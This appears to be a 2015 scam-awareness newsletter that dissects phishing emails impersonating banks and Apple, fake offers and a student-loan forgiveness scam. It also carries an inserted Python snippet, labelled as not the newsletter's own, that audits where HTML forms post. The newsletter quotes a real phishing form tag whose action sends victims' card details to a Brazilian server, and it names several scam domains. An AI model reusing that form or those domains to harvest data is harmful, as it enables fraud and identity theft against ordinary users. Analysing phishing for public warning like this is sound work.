
June 24, 2015

THE WEEK IN REVIEW

We hope Dads everywhere (except the scammers who are trying to scam us all) had a wonderful Father’s Day! We’re pleased to say we only found one online scam specifically targeting Father’s Day gift buying. But first here is a sampling of the week’s subject lines and email addresses. You’ll notice a lot of scams are still using the “dot-science” global top level domain. We have yet to see a legitimate use for this domain…

Sample Scam Subject lines and Email Addresses from the Past Week…

Subject Lines

Brittany Spears sprays this in her mouth daily!

Congrats from Microsoft

Distinguished Women of 2015 – you have been chosen

Get tasty healthy snacks delivered to your door!

I won’t forgive you if you don’t see this

Instantly use these points at any Walgreens

Reminder: Your credit report is ready to be viewed

Share your tablet PC reviews and photos

Summer Deals On All-Inclusive Vacations Here!

Transfer your credit card balances to one credit card

Why you should consider a start up business

YOUR ATM CARD DELIVERY NOTIFICATION FROM THE FBI!!!

Email Addresses

ADHDSymptoms@conful.science

AutoDeals-Alert@galatean.science

BankAcctOptions@seconduce.science

BeverlyHills-MD@gacers.science

CancerTreatmentResources@madistian.science

DealingwithDiabetes@naises.science

HawaiiVacationDeals@themor.eu

iMemories@genneral.work

PsychicReading@Sothercity.com

SmartPhoneRepair@airbada.science

TreatMigraines@rependen.science

TruckClearance@rimcim.science


Phish NETS: American Express, Chase Bank, Apple’s iCloud and GSX Accounts

Phishing scams jumped during the past week (which explains the need for a long column here), including this bogus Chase Bank email with the subject line “Recent suspicious activity on your online account.” You’ll notice that there is no personal information to identify the recipient of this email. And though it comes from chase@memberservice.com, this isn’t chase.com. In fact, a WHOIS lookup of the domain memberservice.com shows that it has been owned since 1996 by a small publishing house called Bookspan LLC. However, the WHOIS record was modified as recently as today (6-21-15), so our guess is that scammers have gained control over this domain’s registration and are misusing it. By the way, that attached Validation Form.htm is a dangerous web document. We’ll show you more information about another one of these below.

The criminals also targeted Apple iCloud users again late in the week, along with Apple GSX users! Apple GSX is Apple’s self-servicing account for businesses/schools who do their own repairs. For some reason, these criminals love to pick on Apple. Check out these emails! The first, with subject line “update icloud settings,” is a poorly designed phish. The sender’s from-address is mospan@kadraplus.pl, and our readers know that addresses and domains ending in a dot followed by 2 letters indicate a country code. This was sent from Poland, and a mouse-over of the link in the email points back to a server in Poland: twojgrecki.pl. This is definitely not Apple.com.


The GSX email is more expertly created. It was sent from an email address that sounds official (but is still not from Apple.com): gsx_admin@notification.com. Also, a mouse-over of the “Verify Now” link points to a very official-sounding domain, gsxappleid.com. This bogus domain is an obvious attempt at fraud and was registered on June 19 with the service GoDaddy.com. Fortunately, it appears that GoDaddy’s staff realized fairly quickly that the domain was being used for fraud and shut it down. You can see that shut-down on the WHOIS record. We wish other domain-name resellers and hosting services, such as Enom.com, were as responsive. Some domain name resellers routinely turn a blind eye in order to make money and don’t seem to care at all that the rest of us are put at risk.


The most dangerous phishing scam this past week targeted lots of American Express card holders. Each email was very professionally crafted and included an attached html webpage. For example, this email below contains a spoofed email address from amex.com and the subject line “Confirm your American Express online details.” The punctuation, spelling, and grammar in the email are nearly perfect. (We see two small errors in grammar/punctuation. Can you find more?)

[Image: Amex phishing email]

The attached webpage form named American_Express_Verification.html is very professionally crafted and contains many legitimate links to American Express. But don’t be fooled! This form pulls several unique graphics from a webserver in Portugal called jpmmotos.pt (2-letter country code is .pt). Most importantly, the code behind this scam form submits your very personal information to a server in Brazil called ecofisco.com.br! According to VirusTotal.com, ten online services have identified this Brazilian domain as malicious and phishing…

[Image: VirusTotal evaluation of ecofisco.com.br]


Click the thumbnail below to see what these criminals were asking victims to provide. No one should divulge this information! Check out this bit of the code that is hidden in this web document. Notice the domain and its 2-letter country code (.br) in the form’s action URL.

[Image: Amex phishing web page]

<form id="oceAccountCID" action="http://ecofisco.com.br/images/vns/imp-update/Administrator/NatWest/update.php" autocomplete="off" class="jsForm" method="post" style="margin: 0px; padding: 0px; border: 0px;">

Delete. Delete. Delete.
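The two checks this column keeps applying, where an attached HTML form actually posts its data and whether a host ends in a two-letter country code, can be automated. This is an added example, not code from The Daily Scam; the sample page below is constructed around the form tag quoted above, and the brand domains passed in (americanexpress.com, amex.com) are assumptions for the test.

```python
# Added example (not The Daily Scam's code): flag HTML attachments whose
# <form action> posts outside the brand's own domains, and note two-letter
# country-code TLDs, as the column does for ecofisco.com.br (.br).
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionParser(HTMLParser):
    """Collect the action attribute of every <form> tag in a document."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":  # HTMLParser already lowercases tag names
            action = dict(attrs).get("action")
            if action:
                self.actions.append(action)


def host_of(url):
    """Lowercase hostname of an absolute URL; None for relative actions."""
    return urlparse(url).hostname or None


def tld_of(host):
    """Last DNS label of a host, e.g. 'br' for ecofisco.com.br."""
    return host.rsplit(".", 1)[-1]


def belongs_to(host, brand_domains):
    """True if host is one of the brand's domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def audit_forms(html, brand_domains):
    """One finding per form: where it posts, off-brand flag, ccTLD flag."""
    parser = FormActionParser()
    parser.feed(html)
    findings = []
    for action in parser.actions:
        host = host_of(action)
        if host is None:  # relative action: posts wherever the file is served
            findings.append({"action": action, "host": None,
                             "off_brand": None, "cctld": None})
            continue
        findings.append({"action": action, "host": host,
                         "off_brand": not belongs_to(host, brand_domains),
                         "cctld": len(tld_of(host)) == 2})
    return findings


# Constructed sample: the form tag quoted in the column, inside a minimal page.
SAMPLE_HTML = """<html><body>
<form id="oceAccountCID" action="http://ecofisco.com.br/images/vns/imp-update/Administrator/NatWest/update.php"
      autocomplete="off" class="jsForm" method="post">
<input name="card"><input type="submit"></form></body></html>"""
```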


YOUR MONEY: Cheap Flights, Sam’s Club and Online Subscriptions

We are so used to giving our email address to companies with whom we do business. We get offers, coupons and promotions to the point where we consider most of them to be spam. This overload makes it harder to spot scams like these three below. Each leads to a malicious website. Can you spot the flaws that should make recipients suspicious? Look carefully at all three and then check out our list of issues at the bottom of the column.


[Image: Sam’s Club members email]


1. The first email for cheap flights did not lead to a hacked server with a strange-sounding name but to a domain that sounded like it could be legitimate — airlinediscounttickets.us. However, the use of .us made us a wee bit suspicious, so we Googled the domain and came up with nothing! No website, no information. Now we were really suspicious and checked it using the Zulu URL Risk Analyzer, and BINGO!

[Image: Zulu URL Risk Analyzer score for the cheap flights domain]


2. The Sam’s Club email didn’t even come from a Sam’s Club domain, and a mouse-over revealed the fraud. Also, the colored box at the bottom contained hidden random text meant to fool antispam servers. Finally, who the heck writes stuff like “You must continue with your life, all you need to do is let us know and will be all good” into a legitimate email?

3. The subscription offer to The Economist magazine came from TheEconomist@gordham.science. This address is a certain giveaway that this is a scam. Yet, the email looks so professionally done! We decided to ask the Zulu URL Risk Analyzer just in case. No question. Delete.

[Image: Zulu URL Risk Analyzer score for the Economist subscription link]


TOP STORY: Federal Student Loan Forgiveness Program

It was reported to The Daily Scam that people started receiving email and website pitches for a Federal Student Loan Forgiveness Program. The first email we saw made us suspicious because it was sent from an address in the Czech Republic (.cz country code), and the body of the email used a couple of subtle tricks meant to avoid antispam servers. For example, instead of writing “student loans,” which might be recognized and blocked, the writer entered “StudentLoans.” And yet, the email contained a toll-free 888 telephone number, which seemed to legitimize the content. So we started digging…

Soon we discovered more of these Student Loan Forgiveness program emails being sent from many different email addresses such as these…


Now we were certain this was a scam, so we Googled the toll-free number and discovered that these scammers had also entered the same information as comment spam on dozens of websites that had nothing to do with education or loans. See below the first page of Google returns. (Comment spam is unwanted comments dropped onto website comment forms, having nothing to do with the forum or blog on which they are dumped.)

[Image: Google search results for the toll-free number]


Scammers often prey upon people who can least afford it. These people may be in need of help financially, medically or even emotionally and may be desperate to try something new to alleviate the stress and pain in their lives. We feel this is an especially nasty practice, even for scammers. A pox upon them! Here are a couple of articles about various scams that target folks looking for debt and student loan relief. If you search Google for student loan forgiveness programs, be careful! There are lots of scam domains being used to trap web searchers like some giant Venus flytrap.


http://www.dailyfinance.com/2014/10/15/student-loan-forgiveness-smart-deal-or-scam/

http://www.nbcnews.com/business/personal-finance/student-loan-repayment-scams-how-avoid-being-ripped-n166781

http://www.bbb.org/washington-dc-eastern-pa/news-events/bbb-scam-alerts/2015/04/student-loan-forgiveness-dont-take-the-bait1/

FOR YOUR SAFETY: Father’s Day

“Make dad smile,” says admin@reusete.com. “Your probably thinking it’s tool late to get dad the perfect gift?” We are especially offended by that “see ya later my friend.” Clicking this link leads to nothing but trouble. Scammers often take advantage of big holidays to push out scams. We were surprised to find only one scam email targeting people for Father’s Day. In case you had any doubts, check out the Zulu URL Risk Analyzer score below for the link “View the Ideas Here.”

[Image: Zulu URL Risk Analyzer score for the Father’s Day link]


ON THE LIGHTER SIDE: How big do you want to dream?

We dream big. Really, we do! We want to believe that millions of people will find our website and learn from it so they’ll be safer online. And we finally found help to get us there! We’re gonna sign up for this webinar to change our lives! We’re gonna put our game plan in action and call Doc and Deana! Watch out world! Here we come!

Until next week, surf safely!

[Image: Webinar email: how big do you want to dream]